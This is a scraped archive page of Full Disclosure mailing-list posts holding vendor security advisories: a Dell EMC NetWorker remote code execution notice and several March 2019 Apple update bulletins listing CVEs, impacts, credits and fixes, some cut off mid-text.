[FD] ESA-2017-123: EMC Networker Remote Code Execution Vulnerability
Restricted - Confidential -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 ESA-2017-123: EMC Networker Remote Code Execution Vulnerability EMC Identifier: ESA-2017-123 CVE Identifier: CVE-2017-8023 Severity Rating: CVSSv3 Base Score: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) Affected products: EMC NetWorker versions 8.2.x EMC NetWorker versions 9.0.x EMC NetWorker versions prior to 9.1.1.5 EMC NetWorker versions prior to 9.2.1 Summary: EMC NetWorker includes an unauthenticated remote code execution vulnerability that may potentially be exploited by malicious users to compromise the affected system. Details: EMC NetWorker may potentially be vulnerable to an unauthenticated remote code execution vulnerability in the Networker Client execution service (nsrexecd) when oldauth authentication method is used. An unauthenticated remote attacker could send arbitrary commands via RPC service to be executed on the host system with the privileges of the nsrexecd service, which runs with administrative privileges. Resolution: The following EMC NetWorker releases address this vulnerability: EMC NetWorker 9.1.1.5 EMC NetWorker 9.2.1 EMC NetWorker 8.2.4.11 The two options below can be used as a workaround: 1. Use nsrauth exclusively and do not allow a fallback to oldauth. 2. For customers who must use oldauth, ensure all 'servers' files are properly configured and review the "Restricting remote program executions and client-tasking rights" section in the EMC NetWorker Security Configuration Guide for how to update the servers file. EMC recommends all customers upgrade at the earliest opportunity. Oldauth is an insecure authentication mode and supported for compatibility purposes only. Customers are strongly recommended to use nsrauth exclusively in their environment. See EMC NetWorker Security Configuration Guides listed below for additional information: https://support.emc.com/docu57698_NetWorker-8.2--Security-Configuration-Guide.pdf https://support.emc.com/docu61097_NetWorker_9.0.x_Security_Configuration_Guide.pdf https://support.emc.com/docu81539_NetWorker-9.1.x-Security-Configuration-Guide.pdf https://support.emc.com/docu85867_NetWorker-9.2-Security-Configuration-Guide.pdf Link to remedies: Customers can download software from two different locations: For EMC NetWorker version 9.1.1: https://support.emc.com/docu86749_NetWorker,-NVE,-NVP-and-Modules-9.1.1-Cumulative-Hotfixes.pdf For EMC NetWorker version 9.2.1: https://support.emc.com/downloads/1095_NetWorker For EMC NetWorker version 8.2.4.11: https://support.emc.com/docu81710_NetWorker-and-NMM-8.2.4-Cumulative-Hotfixes.pdf Severity Rating: For an explanation of Severity Ratings, refer to Dell EMC Knowledgebase article 468307. Dell EMC recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability. Legal Information: Read and use the information in this Dell EMC Security Advisory to assist in avoiding any situation that might arise from the problems described herein. If you have any questions regarding this product alert, contact Dell EMC Software Technical Support at 1-877-534-2867. Dell EMC distributes Dell EMC Security Advisories, in order to bring to the attention of users of the affected Dell EMC products, important security information. Dell EMC recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. Dell EMC disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event, shall Dell EMC or its suppliers, be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or spe cial damages, even if Dell EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply. -BEGIN PGP SIGNATURE- iQIzBAEBCAAdFiEEP5nobPoCj3pTvhAZgSlofD2Yi6cFAlyVNowACgkQgSlofD2Y i6d1Uw//bMPx1u7Eg7q8oa5+Cuoi90nP4WqhOfUHw/2p7ocXJZ9zpwHgQGS2b+XL Et1WPLt/HfUgUz0ej66by46mKwxjvSc00dOouorp+3r0rcqKnQCs8YxYEvF3E6Fa XJyoPsjP6Cn03IAkcRV0busFhCrfrh3njcpwUFy5Sx9XYc+8CzphHFswbggODfgA tjolOTX4SuOLZDZhbnqB4RygNvb1xHGS4rNIhyRLLhQUBHL8+kqj0uWc/q6QsT/9 2NuIg1R+EbC8ojmmCb0p9fRwqOMOdgO9owg/IF4V2p6gIlV+J/hAbr9eGHqdVN7N js1bfJrqsjCNQ0iR7j/ifUs0EiMRdP/OShf5kdFCMafcNKlJoaLd/2elLha+VHDD T+0GT6nL67luUhLo9SlMm+LeqUkXCm20peml6/D9/FFALADe4Si03hnWnaBZL120 JgildayMavnvNv30+JEoX77hud2dsieJkiKPcb/FOhmft1x2vBKBNrH60QGf5qEZ xBWCCVqhKxIKM/K0FtfqoY+cUpotBOvkjikoKqiHSCZGEHGCx5Gfdk6D1IGWh6Fu lRPXCg3tjP1QlwLxLSdcXp7U3IWzgvxV0VBtGMEUkxHSXlp5zsD
[FD] APPLE-SA-2019-3-25-1 iOS 12.2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2019-3-25-1 iOS 12.2 iOS 12.2 is now available and addresses the following: CFString Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Processing a maliciously crafted string may lead to a denial of service Description: A validation issue was addressed with improved logic. CVE-2019-8516: SWIPS Team of Frifee Inc. configd Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious application may be able to elevate privileges Description: A memory initialization issue was addressed with improved memory handling. CVE-2019-8552: Mohamed Ghannam (@_simo36) Contacts Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious application may be able to elevate privileges Description: A buffer overflow issue was addressed with improved memory handling. CVE-2019-8511: an anonymous researcher CoreCrypto Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious application may be able to elevate privileges Description: A buffer overflow was addressed with improved bounds checking. CVE-2019-8542: an anonymous researcher Exchange ActiveSync Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A user may authorize an enterprise administrator to remotely wipe their device without appropriate disclosure Description: This issue was addressed with improved transparency. CVE-2019-8512: an anonymous researcher, an anonymous researcher FaceTime Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A user's video may not be paused in a FaceTime call if they exit the FaceTime app while the call is ringing Description: An issue existed in the pausing of FaceTime video. The issue was resolved with improved logic. CVE-2019-8550: Lauren Guzniczak of Keystone Academy Feedback Assistant Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious application may be able to gain root privileges Description: A race condition was addressed with additional validation. CVE-2019-8565: CodeColorist of Ant-Financial LightYear Labs Feedback Assistant Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious application may be able to overwrite arbitrary files Description: This issue was addressed with improved checks. CVE-2019-8521: CodeColorist of Ant-Financial LightYear Labs file Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Processing a maliciously crafted file might disclose user information Description: An out-of-bounds read was addressed with improved bounds checking. CVE-2019-6237: an anonymous researcher GeoServices Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Clicking a malicious SMS link may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved validation. CVE-2019-8553: an anonymous researcher iAP Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious application may be able to elevate privileges Description: A buffer overflow was addressed with improved bounds checking. CVE-2019-8542: an anonymous researcher IOHIDFamily Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A local user may be able to cause unexpected system termination or read kernel memory Description: A memory corruption issue was addressed with improved state management. CVE-2019-8545: Adam Donenfeld (@doadam) of the Zimperium zLabs Team IOKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A local user may be able to read kernel memory Description: A memory initialization issue was addressed with improved memory handling. CVE-2019-8504: an anonymous researcher IOKit SCSI Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved input validation. CVE-2019-8529: Juwei Lin (@panicaII) of Trend Micro Kernel Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory Description: A buffer overflow was addressed with improved size validation. CVE-2019-8527: Ned Williamson of Google and derrek (@derrekr6) Kernel Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to gain elevated privileges Description: A logic issue was addressed with improved state management. CVE-2019-8514: Samuel Groß of Google
[FD] APPLE-SA-2019-3-25-6 iCloud for Windows 7.11
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2019-3-25-6 iCloud for Windows 7.11 iCloud for Windows 7.11 is now available and addresses the following: CoreCrypto Available for: Windows 7 and later Impact: A malicious application may be able to elevate privileges Description: A buffer overflow was addressed with improved bounds checking. CVE-2019-8542: an anonymous researcher iTunes Available for: Windows 7 and later Impact: Running the iTunes installer in an untrusted directory may result in arbitrary code execution Description: A race condition existed during the installation of iTunes for Windows. This was addressed with improved state handling. CVE-2019-6232: Stefan Kanthak (eskamation.de) WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A type confusion issue was addressed with improved memory handling. CVE-2019-8506: Samuel Groß of Google Project Zero WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved state management. CVE-2019-8535: Zhiyang Zeng (@Wester) of Tencent Blade Team WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-6201: dwfault working with ADLab of Venustech CVE-2019-8518: Samuel Groß of Google Project Zero CVE-2019-8523: Apple CVE-2019-8524: G. Geshev working with Trend Micro Zero Day Initiative CVE-2019-8558: Samuel Groß of Google Project Zero CVE-2019-8559: Apple CVE-2019-8563: Apple WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may disclose sensitive user information Description: A cross-origin issue existed with the fetch API. This was addressed with improved input validation. CVE-2019-8515: James Lee (@Windowsrcer) WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved memory handling. CVE-2019-8536: Apple CVE-2019-8544: an anonymous researcher WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A use after free issue was addressed with improved memory management. CVE-2019-7285: dwfault working at ADLab of Venustech CVE-2019-8556: Apple WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may result in the disclosure of process memory Description: A validation issue was addressed with improved logic. CVE-2019-7292: Zhunki and Zhiyi Zhang of 360 ESG Codesafe Team WebKit Available for: Windows 7 and later Impact: A malicious website may be able to execute scripts in the context of another website Description: A logic issue was addressed with improved validation. CVE-2019-8503: Linus Särud of Detectify WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to universal cross site scripting Description: A logic issue was addressed with improved validation. CVE-2019-8551: Ryan Pickren (ryanpickren.com) Windows Installer Available for: Windows 7 and later Impact: Running the iCloud installer in an untrusted directory may result in arbitrary code execution Description: A race condition existed during the installation of iCloud for Windows. This was addressed with improved state handling. CVE-2019-6236: Stefan Kanthak (eskamation.de) Additional recognition Safari We would like to acknowledge Nikhil Mittal (@c0d3G33k) of Payatu Labs (payatu.com) for their assistance. WebKit We would like to acknowledge Andrey Kovalev of Yandex Security Team for their assistance. Installation note: iCloud for Windows 7.11 may be obtained from: https://support.apple.com/HT204283 Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -BEGIN PGP SIGNATURE- iQJdBAEBCABHFiEEDNXJVNCJJEAVmJdZeC9tht7TK3EFAlyZM7spHHByb2R1Y3Qt c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQeC9tht7TK3FvIRAA msR75UH21iTYcw51dCCfBKSvthsplmLy/4hXwdD975Qk23H6nPRH+0CDQf1E+y3C KmWHZafHoUjfyu28MH5bJcYV9LZ2cTNZ+88f7EKNAH7Ox5MfzEyCO5EtA7Q9F/1W HbMBS7HmWPTFPREI5HzNrilhvV6GvOkql/7Wsp9a6miOJ4QO7oHcLc1YZB9Vh25B xiQJZeJ443DKfJKeWVOL3qVyL3xqGUB0rN3LFIWrFpybfuMyuNwle6lwQvcy0ulK FBCmj1MNlsep0dQHdA/jaR3UYWcNBOTieAh7QTsdOsa+64cTrJtQOqhAtI7ffu3k c+v84wO9URzosbXZEmQgw9lKDd8k+o2qy13QNULsIf0KKeNdhKwNq1EzvvDF0z/a OMot5r1l1ufhKd9SHPJZ1ouXz5d5zx3hjGMMhCxINVKfa26ZEqlRW5ST/vtxwL0v Q8SsfefyowWTimnt+Wl52ErwNgyS/ejTgGRzmrR1zlIVBk2eczwTlMd4bmHYMTHu NHhIZl9CA6Amnb+
[FD] APPLE-SA-2019-3-25-3 tvOS 12.2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2019-3-25-3 tvOS 12.2 tvOS 12.2 is now available and addresses the following: CFString Available for: Apple TV 4K and Apple TV (4th generation) Impact: Processing a maliciously crafted string may lead to a denial of service Description: A validation issue was addressed with improved logic. CVE-2019-8516: SWIPS Team of Frifee Inc. configd Available for: Apple TV 4K and Apple TV (4th generation) Impact: A malicious application may be able to elevate privileges Description: A memory initialization issue was addressed with improved memory handling. CVE-2019-8552: Mohamed Ghannam (@_simo36) CoreCrypto Available for: Apple TV 4K and Apple TV (4th generation) Impact: A malicious application may be able to elevate privileges Description: A buffer overflow was addressed with improved bounds checking. CVE-2019-8542: an anonymous researcher file Available for: Apple TV 4K and Apple TV (4th generation) Impact: Processing a maliciously crafted file might disclose user information Description: An out-of-bounds read was addressed with improved bounds checking. CVE-2019-6237: an anonymous researcher Foundation Available for: Apple TV 4K and Apple TV (4th generation) Impact: An application may be able to gain elevated privileges Description: A memory corruption issue was addressed with improved input validation. CVE-2019-7286: an anonymous researcher, Clement Lecigne of Google Threat Analysis Group, Ian Beer of Google Project Zero, and Samuel Groß of Google Project Zero GeoServices Available for: Apple TV 4K and Apple TV (4th generation) Impact: Clicking a malicious SMS link may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved validation. CVE-2019-8553: an anonymous researcher iAP Available for: Apple TV 4K and Apple TV (4th generation) Impact: A malicious application may be able to elevate privileges Description: A buffer overflow was addressed with improved bounds checking. CVE-2019-8542: an anonymous researcher IOHIDFamily Available for: Apple TV 4K and Apple TV (4th generation) Impact: A local user may be able to cause unexpected system termination or read kernel memory Description: A memory corruption issue was addressed with improved state management. CVE-2019-8545: Adam Donenfeld (@doadam) of the Zimperium zLabs Team Kernel Available for: Apple TV 4K and Apple TV (4th generation) Impact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory Description: A buffer overflow was addressed with improved size validation. CVE-2019-8527: Ned Williamson of Google and derrek (@derrekr6) Kernel Available for: Apple TV 4K and Apple TV (4th generation) Impact: A malicious application may be able to determine kernel memory layout Description: A memory initialization issue was addressed with improved memory handling. CVE-2019-8540: Weibo Wang (@ma1fan) of Qihoo 360 Nirvan Team Kernel Available for: Apple TV 4K and Apple TV (4th generation) Impact: An application may be able to gain elevated privileges Description: A logic issue was addressed with improved state management. CVE-2019-8514: Samuel Groß of Google Project Zero Kernel Available for: Apple TV 4K and Apple TV (4th generation) Impact: A local user may be able to read kernel memory Description: A memory corruption issue was addressed with improved memory handling. CVE-2019-7293: Ned Williamson of Google Kernel Available for: Apple TV 4K and Apple TV (4th generation) Impact: A malicious application may be able to determine kernel memory layout Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed with improved input validation. CVE-2019-6207: Weibo Wang of Qihoo 360 Nirvan Team (@ma1fan) CVE-2019-8510: Stefan Esser of Antid0te UG Power Management Available for: Apple TV 4K and Apple TV (4th generation) Impact: A malicious application may be able to execute arbitrary code with system privileges Description: Multiple input validation issues existed in MIG generated code. These issues were addressed with improved validation. CVE-2019-8549: Mohamed Ghannam (@_simo36) of SSD Secure Disclosure (ssd-disclosure.com) Siri Available for: Apple TV 4K and Apple TV (4th generation) Impact: A malicious application may be able to initiate a Dictation request without user authorization Description: An API issue existed in the handling of dictation requests. This issue was addressed with improved validation. CVE-2019-8502: Luke Deshotels of North Carolina State University, Jordan Beichler of North Carolina State University, William Enck of North Carolina State University, Costin Carabaș of University POLITEHNICA of Bucharest, and Răzvan Deaconescu of University POLITEHNICA of Bucharest TrueTypeScaler Available for: Apple TV 4K and Apple TV (4th generation) Impact: Processing a maliciously crafted font may result in the disclosure of process memory Description: An out-of
[FD] APPLE-SA-2019-3-25-5 iTunes 12.9.4 for Windows
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2019-3-25-5 iTunes 12.9.4 for Windows iTunes 12.9.4 for Windows is now available and addresses the following: CoreCrypto Available for: Windows 7 and later Impact: A malicious application may be able to elevate privileges Description: A buffer overflow was addressed with improved bounds checking. CVE-2019-8542: an anonymous researcher WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A type confusion issue was addressed with improved memory handling. CVE-2019-8506: Samuel Groß of Google Project Zero WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved state management. CVE-2019-8535: Zhiyang Zeng (@Wester) of Tencent Blade Team WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-6201: dwfault working with ADLab of Venustech CVE-2019-8518: Samuel Groß of Google Project Zero CVE-2019-8523: Apple CVE-2019-8524: G. Geshev working with Trend Micro Zero Day Initiative CVE-2019-8558: Samuel Groß of Google Project Zero CVE-2019-8559: Apple CVE-2019-8563: Apple WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may disclose sensitive user information Description: A cross-origin issue existed with the fetch API. This was addressed with improved input validation. CVE-2019-8515: James Lee (@Windowsrcer) WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved memory handling. CVE-2019-8536: Apple CVE-2019-8544: an anonymous researcher WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A use after free issue was addressed with improved memory management. CVE-2019-7285: dwfault working at ADLab of Venustech CVE-2019-8556: Apple WebKit Available for: Windows 7 and later Impact: A malicious website may be able to execute scripts in the context of another website Description: A logic issue was addressed with improved validation. CVE-2019-8503: Linus Särud of Detectify WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may result in the disclosure of process memory Description: A validation issue was addressed with improved logic. CVE-2019-7292: Zhunki and Zhiyi Zhang of 360 ESG Codesafe Team WebKit Available for: Windows 7 and later Impact: A sandboxed process may be able to circumvent sandbox restrictions Description: A memory corruption issue was addressed with improved validation. CVE-2019-8562: Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of Chaitin Security Research Lab WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to universal cross site scripting Description: A logic issue was addressed with improved validation. CVE-2019-8551: Ryan Pickren (ryanpickren.com) Additional recognition Safari We would like to acknowledge Nikhil Mittal (@c0d3G33k) of Payatu Labs (payatu.com) for their assistance. WebKit We would like to acknowledge Andrey Kovalev of Yandex Security Team for their assistance. Installation note: iTunes 12.9.4 for Windows may be obtained from: https://www.apple.com/itunes/download/ Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -BEGIN PGP SIGNATURE- iQJdBAEBCABHFiEEDNXJVNCJJEAVmJdZeC9tht7TK3EFAlyZM7kpHHByb2R1Y3Qt c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQeC9tht7TK3Ec0RAA nGDG01Ralu3vmvx1OPEfY1Ebf770lEYbG1Fb7ZE13iaSKFaPu4S3R2bpRAwjz4eV 3u2Q75tKuQhntOeuxwdhXC95/Udeh45m+BN03yqDlK3qBohTqCl1VGAch5aLc52V g+BOIGP/+NW3MqveRE9WoDF8TO021cjKmrtRqlF022dSZihRS6mXHHB5x2Uj9Jaq hIFdFXu/EO0O3VHaoHSCmfpiA5SJqSoNZJJDdwjh9acj2/cIFcdbhhR6IE3MufAh 7O6IDWt8h95wqhJubK8dKkIDpKBSILqNxrslpoCt8OntCk5P64RlGUDcAXGLm8Tt 1imDpIK6Dr4VFQ0nYHx1xhq0gGMPEzUSW/W8j9tMO3TISlY+1632Sp7fP9tFMfyp tTmv+kucifAA7yGMxZXh7d9WnkvzY6AkHJ/VwiGexemUDxBGsYSAtbZPmwbfkypl IQ0Eg8hV6VqG7qNIq6ePuruBxtwjjZcx8p8uOUQj8uSsG8aSYxHUOoWa4idY7APg absij97ZRrXC6OSjmoyNUAwgmmwhOm2hNXErnK0YURFeamPcyvqzTamAy6GmCvhz WZGax0M0v7KOpPEEbJUVjJ7rN8g1v7gaY0LTqobjMWRk6+pXeSJ9loO0p682Gkt3 pvl90xARoY+d9ywFQ6Z3XawFQ8PJokCkPrzvjj+SlZk= =NF9p -END PGP SIGNATURE- ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS:
[FD] APPLE-SA-2019-3-25-7 Xcode 10.2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2019-3-25-7 Xcode 10.2 Xcode 10.2 is now available and addresses the following: Kernel Available for: macOS 10.13.6 or later Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved input validation. CVE-2018-4461: Ian Beer of Google Project Zero Installation note: Xcode 10.2 may be obtained from: https://developer.apple.com/xcode/downloads/ To check that the Xcode has been updated: * Select Xcode in the menu bar * Select About Xcode * The version after applying this update will be "10.2". Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -BEGIN PGP SIGNATURE- iQJdBAEBCABHFiEEDNXJVNCJJEAVmJdZeC9tht7TK3EFAlyZPJspHHByb2R1Y3Qt c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQeC9tht7TK3HjrQ// ZlUuus0hA3LOUM5PTmYkrOshF3VHp4ROG3lir2gvcQbz0xeRkWD/wJJZhfjBymYd aQYDbouFVJb9WSTXMPb52hz86haeP7UQ5qEIDv+cTNSZtA2vTM4Jx+5134L5C1Sz pPVTqu5uel1+F0c9wPH9TV0u4VaRxnE5z9hIPzoQiXHqs9jhYsgtk9OyiUTnMijd Uqx7yg758Rorpy1IH5C1uuxTA2qvP7lLL4MmuElXJcsCcQvxvYwiSL3c3pwPQYG9 OEm1fiQ/gX08kLH+kKUe5B7OP+OMcpiNcZwvD9IJkQLdWbvU6vyoqTkAAvKX6Y+q ncnsfZDryP4fwuPTm2q4zt7T9WfPBr3nBdc1VTDHkyX9cXwyJ8oPH5Oo6X6jeUlQ gpBGUK2RhlmL/jQp/Q7QQ/qWzcR+Hq3WjMkVLbPCrCl8/Vx+ZwNqvoQvSW+Hxd4d JAJ8tlgRZupyJnfdJxKo8hz7iZKZS2eR1YjwW7GxHeIiLX3TA5rgY/yTYKM/Kxu/ nMwjeymFrtj/CzPQBHRxE/sSx+ly6btFGjEUVrmEBEPpWsOPDEAi4Nd4V9lsFyay Jp4oFL/OjL+upjOWaE0rFED9NmVgqDSjmoInQpzqg749tYrkQfTzOt4X/+dGCC27 tFwu8BbajKF8aSzguKv3D9oAUwYoH/L1bdZVX2vSWyE= =gqgW -END PGP SIGNATURE- ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] APPLE-SA-2019-3-25-4 Safari 12.1
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2019-3-25-4 Safari 12.1 Safari 12.1 is now available and addresses the following: Safari Reader Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and Mojave 10.14.4 Impact: Enabling the Safari Reader feature on a maliciously crafted webpage may lead to universal cross site scripting Description: A logic issue was addressed with improved validation. CVE-2019-6204: Ryan Pickren (ryanpickren.com) CVE-2019-8505: Ryan Pickren (ryanpickren.com) WebKit Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and Mojave 10.14.4 Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A type confusion issue was addressed with improved memory handling. CVE-2019-8506: Samuel Groß of Google Project Zero WebKit Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and Mojave 10.14.4 Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved state management. CVE-2019-8535: Zhiyang Zeng (@Wester) of Tencent Blade Team WebKit Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and Mojave 10.14.4 Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-6201: dwfault working with ADLab of Venustech CVE-2019-8518: Samuel Groß of Google Project Zero CVE-2019-8523: Apple CVE-2019-8524: G. Geshev working with Trend Micro Zero Day Initiative CVE-2019-8558: Samuel Groß of Google Project Zero CVE-2019-8559: Apple CVE-2019-8563: Apple WebKit Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and Mojave 10.14.4 Impact: Processing maliciously crafted web content may disclose sensitive user information Description: A cross-origin issue existed with the fetch API. This was addressed with improved input validation. CVE-2019-8515: James Lee (@Windowsrcer) WebKit Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and Mojave 10.14.4 Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved memory handling. CVE-2019-8536: Apple CVE-2019-8544: an anonymous researcher WebKit Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and Mojave 10.14.4 Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A use after free issue was addressed with improved memory management. CVE-2019-7285: dwfault working at ADLab of Venustech CVE-2019-8556: Apple WebKit Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and Mojave 10.14.4 Impact: A malicious website may be able to execute scripts in the context of another website Description: A logic issue was addressed with improved validation. CVE-2019-8503: Linus Särud of Detectify WebKit Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and Mojave 10.14.4 Impact: Processing maliciously crafted web content may result in the disclosure of process memory Description: A validation issue was addressed with improved logic. CVE-2019-7292: Zhunki and Zhiyi Zhang of 360 ESG Codesafe Team WebKit Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and Mojave 10.14.4 Impact: A sandboxed process may be able to circumvent sandbox restrictions Description: A memory corruption issue was addressed with improved validation. CVE-2019-8562: Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of Chaitin Security Research Lab WebKit Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and Mojave 10.14.4 Impact: Processing maliciously crafted web content may lead to universal cross site scripting Description: A logic issue was addressed with improved validation. CVE-2019-8551: Ryan Pickren (ryanpickren.com) Additional recognition Safari We would like to acknowledge Nikhil Mittal (@c0d3G33k) of Payatu Labs (payatu.com) for their assistance. WebKit We would like to acknowledge Andrey Kovalev of Yandex Security Team for their assistance. Installation note: Safari 12.1 may be obtained from the Mac App Store. Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -BEGIN PGP SIGNATURE- iQJdBAEBCABHFiEEDNXJVNCJJEAVmJdZeC9tht7TK3EFAlyZM7kpHHByb2R1Y3Qt c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQeC9tht7TK3F9mw// eDj85xvN64fiki5XR1Toh6Ef4mNoVtRjiwD9f7SAKK7j384eP2BXSkScKv6Y1U7M Vd07rBluq9Lw/CEq9Vwu/a2yOa22ilTy4q2O36rXoJ5LC0O4xjmoXN2M72mbPFqn 7vDmQTZ8/AxZQF3D57d+cMrdxKZbQ1wNJRQhRUrnNe8VSwwZ2GtHTJ+PnIeq93yb i6uewLWhkfObOrPH4uyx/v3N1ZxfC5S9mSNBLio1C7iQpObBfYt7JlioZZMqiD2d zqV+DBJEmycaANFngC/VDAR1PH/C/h1kEYJotRKUCVucnceptE/3HT0CtE+wFQCU rg
[FD] APPLE-SA-2019-3-25-2 macOS Mojave 10.14.4, Security Update 2019-002 High Sierra, Security Update 2019-002 Sierra
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2019-3-25-2 macOS Mojave 10.14.4, Security Update 2019-002 High Sierra, Security Update 2019-002 Sierra macOS Mojave 10.14.4, Security Update 2019-002 High Sierra, Security Update 2019-002 Sierra are now available and addresses the following: AppleGraphicsControl Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.3 Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: A buffer overflow was addressed with improved size validation. CVE-2019-8555: Zhiyi Zhang of 360 ESG Codesafe Team, Zhuo Liang and shrek_wzw of Qihoo 360 Nirvan Team Bom Available for: macOS Mojave 10.14.3 Impact: A malicious application may bypass Gatekeeper checks Description: This issue was addressed with improved handling of file metadata. CVE-2019-6239: Ian Moorhouse and Michael Trimm CFString Available for: macOS Mojave 10.14.3 Impact: Processing a maliciously crafted string may lead to a denial of service Description: A validation issue was addressed with improved logic. CVE-2019-8516: SWIPS Team of Frifee Inc. configd Available for: macOS Mojave 10.14.3 Impact: A malicious application may be able to elevate privileges Description: A memory initialization issue was addressed with improved memory handling. CVE-2019-8552: Mohamed Ghannam (@_simo36) Contacts Available for: macOS Mojave 10.14.3 Impact: A malicious application may be able to elevate privileges Description: A buffer overflow issue was addressed with improved memory handling. CVE-2019-8511: an anonymous researcher CoreCrypto Available for: 